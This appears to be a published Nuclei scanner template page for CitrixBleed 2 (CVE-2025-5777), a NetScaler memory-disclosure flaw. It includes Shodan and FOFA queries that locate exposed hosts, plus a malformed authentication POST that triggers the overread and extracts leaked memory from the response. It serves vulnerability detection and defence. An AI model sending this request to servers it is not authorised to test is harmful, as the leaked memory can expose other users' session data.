Citrix NetScaler Memory Disclosure - CitrixBleed 2
CVE-2025-5777
Early Release
Description: Insufficient input validation leading to memory overread on the NetScaler Management Interface NetScaler ADC and NetScaler Gateway
Severity: Critical
Exploit Probability: 0%
Published Date: July 5, 2025
Template Author: watchtowr, dhiyaneshdk, darses
CVE-2025-5777.yaml
id: CVE-2025-5777

info:
  name: Citrix NetScaler Memory Disclosure - CitrixBleed 2
  author: watchtowr,DhiyaneshDk,darses
  severity: critical
  description: |
    Insufficient input validation leading to memory overread on the NetScaler Management Interface NetScaler ADC and NetScaler Gateway
  reference:
    - https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX693420
    - https://labs.watchtowr.com/how-much-more-must-we-bleed-citrix-netscaler-memory-disclosure-citrixbleed-2-cve-2025-5777/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-5777
  classification:
    epss-score: 0.00042
    epss-percentile: 0.12361
  metadata:
    verified: true
    max-request: 1
    shodan-query:
      - title:"NetScaler Gateway"
      - title:"NetScaler AAA"
      - http.favicon.hash:-1166125415
      - http.favicon.hash:-1292923998
    fofa-query:
      - title="NetScaler Gateway"
      - title="NetScaler AAA"
      - icon_hash="-1166125415"
      - icon_hash="-1292923998"
  tags: cve,cve2025,netscaler,citrix,exposure

http:
  - raw:
      - |+
        POST /p/u/doAuthentication.do HTTP/1.0
        Host: {{Hostname}}
        bleed_attack: {{iteration}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Content-Length: 5

        login

    unsafe: true

    payloads:
      iteration:
        - "{{rand_int(1,5)}}"

    extractors:
      - type: regex
        name: iv
        part: body
        regex:
          - '<InitialValue>([^<]{10,})</InitialValue>'
        internal: true

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - 'len(iv) > 0'
          - 'contains(to_lower(header), "application/vnd.citrix.authenticateresponse")'
          - '!contains(to_string(iv), "false")'
          - '!contains(to_string(iv), "true")'
          - '!contains(to_string(iv), "<InitialValue></InitialValue>")'
        condition: and
# digest: 4a0a0047304502206b67756161e3b05759fd9b89e48fc20df8b936eb68641538bf775f6622acb3cb022100a66c907bf2dc255cf92f5d45b38725b3fb77795d037772f710e8f78ed0c503bd:922c64590222798bb761d5b6d8e72950